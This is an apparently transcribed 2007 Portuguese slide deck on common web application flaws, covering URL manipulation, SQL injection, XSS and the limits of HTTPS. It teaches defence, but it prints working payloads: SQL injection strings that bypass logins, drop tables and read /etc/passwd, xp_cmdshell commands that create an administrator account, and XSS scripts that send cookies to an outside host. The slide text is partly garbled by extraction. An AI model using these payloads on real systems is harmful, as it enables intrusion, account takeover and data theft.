Falhas mais comuns em aplicações web

Transcrição

1 Falhas mais comuns em aplicações web Rodrigo Assad, out/2007 1

2 Agenda Introdução Explicando cada ataque através de exemplos URL Manipulation SQL Injection XSS Cross Site Scripting Como resolve-los O que HTTPS nos oferece Porque HTTPS não resolve nossos problemas? Introdução Os ataques a serviços de rede estão se tornando muito sofisticados A criatividade humana não para Mas o que faltava? APLICAÇÕES!!! Mas será que é possível? Atualmente a maioria dos BUG s reportados estão em aplicações Application Security!= Network Security Não se esqueçam: Quem provê acesso aos dados? As aplicações!!! 2

3 Introdução Lendas Urbanas Não ha problemas Até que a aplicação seja comprometida Erros de runtime não são problemas (tratamento de erros) Exponham informações relevantes Consumam todo recurso do servidor Web Services não são vulneráveis Quase nunca testados e raramente segurança é considerada Introdução - Números Gartner 75% dos ataques acontecem no nível das aplicações Em caso de falha no sistema provavelmente os desenvolvedores são três vezes mais culpados do que os administradores de sistemas NIST 92% das vulnerabilidadces estão no nível das aplicações 3

4 Introdução Nosso foco será demonstrar estes BUG s de forma prática Para nos proteger temos que entender das táticas e armas no nosso inimigo Temos que ter nossas armas para nos defender!!! 4

5 Testes e segurança por onde vai. Contexto Não há segurança de sistemas sem a conjuncão de tres fatores Boas praticas de codificação Metodologia adequada (arquitetura e etc) Testes... E ai vem... 5

6 O que é segurança Segurança em um end line Mas o que é isso? Não se discute segurança sem entender de Arquitetura de Computadores, Sistemas Operacionais, Redes de computadores (protocolos de comunicação, Linguagem de programação, engenharia de software e Logica. O que é segurança Entao o que eu preciso saber para se poder testar... Opção 1: seguir os procedimentos definidos alguem que sabe disso tudo Opção 2: Saber disso tudo 6

7 Então para o que querem... Então para o que querem... 7

10 Então para o que querem... Segurança de Redes Recursos Sites

11 Segurança de Redes Periódicos Linux Journal Sys Admin Magazine Information Security SC Info Security Magazine Security Magazine (Nacional) Testes 11

12 OSSTMM 12

13 Agora faça seu checklist O que fazer? O que testar? Como fazer? São as resposta que queremos. Vamos começar por... AQUI Em Aplicações WEB 13

14 URL Manipulation O comando GET requisita informações importantes na URL Os parâmetros podem ser manipulados para se obter resultados satisfatórios O impacto é ALTO Variações podem ser feitas para se tentar obter resultados interessantes ebitamount=1 URL Manipulation 14

15 URL Manipulation SQL Injection A idéia é injetar um comando SQL (Structured Query Language) ou comando como imput dos dados em um formulário WEB Todos os parâmetros passados são direcionados para o banco de dados O atacante pode manipular com as tabelas e dados diretamente 15

16 Causas - SQL Injection public void OnLogon(object src, EventArgs e){ SqlConnectioncon = new SqlConnection( "server=(local);database=mydb;uid=sa;pwd;" ); string query = String.Format( "SELECT COUNT(*) FROM Users WHERE " + "username='{0}' AND password='{1}'", txtuser.text, txtpassword.text ); SqlCommand cmd = new SqlCommand(query, con); conn.open(); SqlDataReader reader = cmd.executereader(); try{ if(reader.hasrows()) IssueAuthenticationTicket(); else TryAgain(); } finally{ con.close() } } SQL Injection Problemas Esperado: username: abc password: teste123 Quando submetido a query será montada como: select * from users where username='abc abc' and password = 'test123 test123' Não esperado: username: abc'; -- password: A query enviada para o banco de dados será: select * from users where uname='abc abc ; --' and password='' 16

17 SQL Injection Problemas Esperado: Username: doug Password: SELECT COUNT(*) FROM Users WHERE username='doug doug' and Não esperado: Username: ' OR 1=1 -- Password: SELECT COUNT(*) FROM Users WHERE username='' ' OR 1=1 -- and password='' SQL Injection Site vulnerável Login com Sucesso Usuário Malicioso Esperado Não esperado 17

18 SQL Injection Mais exemplos Identificando campos de uma tabela SELECT fieldlist FROM table WHERE field = 'x' ' AND IS NULL; --'; Verificando se a tabela existe SELECT , passwd, login_id, full_name FROM table WHERE = 'x'' AND 1=(SELECT COUNT(*) FROM tabname); --'; SQL Injection Mais exemplos Procurando por usuários SELECT , passwd, login_id, full_name FROM members WHERE = 'x'' OR full_name LIKE '%Maria Maria%'; Ataques de força bruta SELECT , passwd, login_id, full_name FROM members WHERE = ususario ususario@provedor provedor.com' AND passwd = senha senha '; 18

19 SQL Injection Mais exemplos Verificando as permissões no Database SELECT , passwd, login_id, full_name FROM members WHERE = 'x';' DROP TABLE members; --'; Criando um usuário SELECT , passwd, login_id, full_name FROM members WHERE = 'x';' INSERT INTO members (' ',' ','passwd passwd',' ','login_id login_id', 'full_name full_name') VALUES ( usuario@provedor.com', ( usuario@provedor.com', senha', senha', user user', ', User da Internet');-- --'; SQL Injection Mais exemplos Alterando o mail de comunicação SELECT , passwd, login_id, full_name FROM members WHERE = 'x';' UPDATE members SET = usuario@provedor.com' WHERE = usuario@hackprovedor.com usuario@hackprovedor.com'; 19

20 Caracteres utilizados ' ou " Utilizado para indicar tipo char -- ou # Comentário /* */ Comentário de várias linhas + Adição, concatenação Concatenação % Wildcard?Param1=foo&Param2=bar Parâmetros da URL PRINT Muito utilizado quando não temos Variável Variável Global waitfor delay '0:0:10' Delay SQL Injection here=all&sort_mode=delete%20*%20from %20users_uses 20

21 Determinando a versão do SGBD Na maioria do tempo as mensagens de erro nos ajudam a identificar qual o SGBD utilizado As mensagens de erro ODBC mostram SGBD utilizado Se não tivermos as mensagens ODBC Tentamos analisar qual a tecnologia utilizada na aplicação e no servidor WEB Tentamos utilizar caracteres, comandos ou stored procedures que geram erros específicos Determinando a versão do SGBD Concatenat e Strings Null replace Positio n Op Sys interactio n Cast MS SQL T-SQL ' '+' ' Isnull() CHARIND EX xp_cmdsh ell Yes MySQL concat (" ", " ") Ifnull() LOCATE() select into outfile / dumpfile No Access " "&" " Iff(Isnull() ) InStr() #date# No Oracle PL/SQL ' ' ' ' Ifnull() InStr() utf_file No DB2 " "+" " Ifnull() InStr() import from export to Yes Postgres PL/pgSQL ' ' ' ' COALESC E() TEXTPOS( ) Call Yes 21

22 Interagindo com o sistema Operacional Existem duas maneiras de se interagir com o sistema operacional Lendo arquivos Obtendo arquivos de senhas Trocando senhas dos usuários Executando comandos que troquem parâmetros do sistema Execução direta de comandos Não ha limites!!! Qualquer ação depende do privilégio que o usuários utilizado pelo SGBD possui MySQL e a interação O.S. MySQL LOAD_FILE ' union select 1,load_file('/etc/passwd'),1,1,1; LOAD DATA INFILE create table temp( line blob ); load data infile '/etc/passwd' into table temp; select * from temp; SELECT INTO OUTFILE 22

23 MS SQL e a interação O.S. MS SQL Server '; exec master..xp_cmdshell 'ipconfig > test.txt' -- '; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM 'test.txt' -- '; begin varchar(8000) ; ' ; ' from tmp where txt<@data ; as x into temp end -- ' and 1 in (select substring(x,1,256) from temp) -- '; sysname; = 'del test.txt'; EXEC drop table temp; drop table tmp -- Arquitetura mais comum Sempre tenha em mente O SQL normalmente é executado em um outro servidor O servidor de BD normalmente não tem acesso a Internet e é protegido Web Server Application Server Database Server Paginas WEB Validação Da Entrada Execução Do SQL 23

24 Comando de rede relevantes Usando a SP xp_cmdshell podemos executar: Ipconfig /all Tracert myip arp -a nbtstat -c netstat -ano route print Manipulando com as informações da rede '; varchar(256); = ' del test.txt && arp -a >> test.txt && ipconfig /all >> test.txt && nbtstat -c >> test.txt && netstat -ano >> test.txt && route print >> test.txt && tracert -w 10 -h 10 google.com >> test.txt'; EXEC -- '; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM 'test.txt' -- '; begin varchar(8000) ; ' ; ' from tmp where txt<@data ; as x into temp end -- ' and 1 in (select substring(x,1,255) from temp) -- '; sysname; = 'del test.txt'; EXEC drop table temp; drop table tmp -- 24

25 Manipulando com o S.O. Linux MySQL ' union select 1, (load_file('/etc/passwd')),1,1,1; MS SQL Criando usuários '; exec xp_cmdshell 'net user /add victor Pass123'-- '; exec xp_cmdshell 'net localgroup /add administrators victor' -- Iniciando serviços '; exec master..xp_servicecontrol 'start','ftp Publishing' -- Obtendo a senha do VNC '; binary(8) output select cast(@out as bigint) as x into TEMP-- ' and 1 in (select cast(x as varchar) from temp) -- 25

26 XSS Cross Site Scripting WEB Session Hijaking Não a ligação entre o ID do login e o ID da sessão A sessão do usuário pode ser roubada Impacto é ALTO A idéia e obter de alguma forma o HASH da sessão 26

27 Cross Site Scripting sitehaker.com banco.com Webpage + Cookies Link malicioso em uma pagina web ou malicioso Reflected Code <SCRIPT>Envia o Cookie para attacker.com</script> Executed Malicious Link <SCRIPT>Envia cookie / para ` sitehaker.com User Cookie Cross Site Scripting (XSS) Esta vulnerabilidade tira vantagens de sites que não fazem o tratamento dos dados de entrada. O POST contém um script que pode ser executado via browser <script>window.navigate(" somesite.net/steal.asp?cookie=" +document.cookie)</script> 27

28 XSS Como o atacante depura Pode colocar uma mensagem no post <script>alert( this is vulnerable )</script> A aplicação retorna a sua submissão XSS Exemplos Pode se receber um com o um link O resultado é enviado para um site < script>window. navigate(" eal.asp?cookie="+document.cooki e)</script> 28

29 XSS Exemplos do passado ert(%22rfdslabs%22)%3c/script%3e ><script>alert(document.cookie)</script> ge2.html?tw=<script>alert( Test );</script> cument.cookie)</script>&frompage=4&page=1&ct=vvt V&mh=0&sh=0&RN=1 arch_exe?search_text=%22%3e%3cscript%3ealert%28 document.cookie%29%3c%2fscript%3e Solução Sempre valide a sessão com login e os parâmetros críticos 29

30 Sistemas distribuídos Sistemas distribuídos podem ser vistos de maneira geral como diferentes elementos de software (aplicações) executando remotamente (ou em locais remotos) e se comunicando para fornecer/consumir serviços. Conjunto de máquinas autônomas Interconectadas por canais de comunicação Comunicando-se por troca de mensagens Independência de falhas (falhas parciais) Ausência de relógio global Ausência de estado global Estado compartilhado da aplicação (através de comunicação) Sistemas distribuídos Além de considerar todos os problemas anteriores Eles se potencializam num cenário distribuído Precisamos usar Comunicação Segura Autenticação Integridade dos dados trafegados Serviços de rede passam a ser problemas : DNS Principalmente. 30

31 Comunicação segura O que podemos usar VPN: IPSec, PPTP,... Custoso Por ser necessário uma configuração especial, a aplicação depende não somente dela mas da rede prover Mas lembre-se A REDE É INSEGURA!!!!! E a aplicação? Autenticação Integridade dos dados trafegados Que tal uma PKI? Temos Autenticação Temos Integridade e confidenciaidade se encriptarmos os dados 31

32 O que HTTPS nos oferece HTTPS resolve os problemas de segurança apontados anteriormente? Mas então para que usar HTTPS? Muitas vezes dizemos que o uso de HTTPS nos temos o servidor seguro O que HTTPS nos oferece HTTPS é a versão segura do protocolo HTTP que implementa a autenticação e encriptação da comunicação. Previne os ataques do tipo men-in-the-middle e que dados interceptados sejam lidos A autenticação é uma característica muito explorada atualmente ICP-BR 32

33 O que HTTPS nos oferece 1. Negocia qual sistema de codificação será usado durante a transferência 2. Estabelece e troca as chaves de sessão entre o cliente e o servidor 3. Opcionalmente autentica o servidor para o cliente 4. Opcionalmente autentica o cliente para o servidor Autenticação usando certificados e chaves públicas/privadas Fase do desafio (Mensagem Randômica) Identificão da Conexão Randômica (server) Fase do desafio (Mensagem Identificação Randômica) da Conexão Randômica (server) Protocolos de encriptação Protocolos de Encriptação OK Web server End user OK! CA chave pública Chave e certificado público do servidor Se o cliente não tiver a chave pública da CA (recebemos uma mensagem informando O certificado não é valido) Cancel Always Trust Trust this time 33

34 Autenticação usando certificados e chaves públicas/privadas Fase do desafio (Mensagem Randômica Web server Identificão da Conexão Randômica (server) Sessão master Par de chaves simétricas (Encriptado) End user CA chave pública Chave e certificado público do servidor Autenticação usando certificados e chaves públicas/privadas Fase do desafio (Mensagem Randômica Identificão da Conexão Randômica (server) A autenticação do cliente pode começar agora Idenfificão da Conecção Randomica Fase do (server) desafio (Mensagem Randômica Sessão master Leitura Par de chaves simétricas Web server Escrita End user Escrita CA chave pública Chave e certificado Par de chaves público do servidor simétricas Leitura 34

35 Porque HTTPS não resolve nossos problemas? Porque nossos problemas não estão apenas nos protocolos ou na comunicação. Temos problemas nas aplicações e estas hierarquicamente estão acima dos protocolos de comunicação. Autorização Associar direitos, capacidade e habilidades associadas a um assunto A autorização geralmente vem após uma autenticação Ex.: Uma vez que se sabe quem é o usuário foi autenticado o serviço decidirá o que o usuário pode fazer no contexto que ele esta autorizado 35

36 Autorização RBAC Autorização baseada em perfil Autorização baseada em contexto Auditoria Loggin analises Data warehouse Mineração de dados Correlação de eventos 36

37 Próximos passos Componente focado em resolver os problemas apresentados Não intrusivo Flexível Performance Fácil de usar Autenticação Componente para autenticar Login/Senha Certificado Digital Biometria Referências Open-Source Security Testing Methodology Manual Web Application Disassembly with ODBC Error Messages JavaOne 2005 Strategies for Securing Java Technology Code Web Services Security Attacks in Action 9 Ways to Hack a Web App Advanced SQL Injection In SQL Server applications Advanced Cross Site Scripting CROSS-SITE TRACING (XST) SQL Injection Signatures Evasion 37

38 F I M 38